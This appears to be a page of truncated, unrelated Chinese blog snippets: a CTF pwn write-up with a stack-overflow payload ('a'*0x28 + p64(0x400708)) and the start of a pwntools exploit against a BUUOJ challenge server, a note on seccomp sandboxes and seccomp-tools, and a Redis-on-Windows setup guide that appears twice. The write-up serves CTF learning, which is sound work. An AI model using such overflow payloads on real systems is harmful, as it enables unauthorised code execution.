首先shift+f12查看字串发现,/bin/sh 双击跟进发现调用函数的地址:0X400708 点击main函数查看反编译代码,发现scanf("%s", v4),栈溢出漏洞 双击v4查看内存,需溢出28字节 payload即为:'a'*0x28 + p64(0x400708)接下来构造exp: frompwnimport*p = remote('node4.buuoj.cn',27021)bin_sh =0x400708payload ...
而在ctf中 沙盒会禁用一些函数,这样我们平时一般执行的execve或者open等等的函数就不能够进行使用!! 看到源码中出现了sanbox就是沙盒机制,遇到沙盒那么我们需要一个工具去看看他到底啊禁用了哪些函数,这个工具就是seccomp-tools 当然这需要我们在虚拟机安装seccoomp-tools,然后输入seccomp-tools dump ./我们需要看的elf文...
1:只在命令行启动: (1):进入Redis安装目录,输入:redis-server redis.windows.conf (2): 连接操作:输入: redis-cli.exe -h 127.0.0.1 -p 6379 (6379是端口号) 如果想把redis设成本地服务: (1)进入Redis安装目输入:redis-server --service-install redis.windows-service.conf --loglevel verbose (2)卸载...
1:只在命令行启动: (1):进入Redis安装目录,输入:redis-server redis.windows.conf (2): 连接操作:输入: redis-cli.exe -h 127.0.0.1 -p 6379 (6379是端口号) 如果想把redis设成本地服务: (1)进入Redis安装目输入:redis-server --service-install redis.windows-service.conf --loglevel verbose (2)卸载...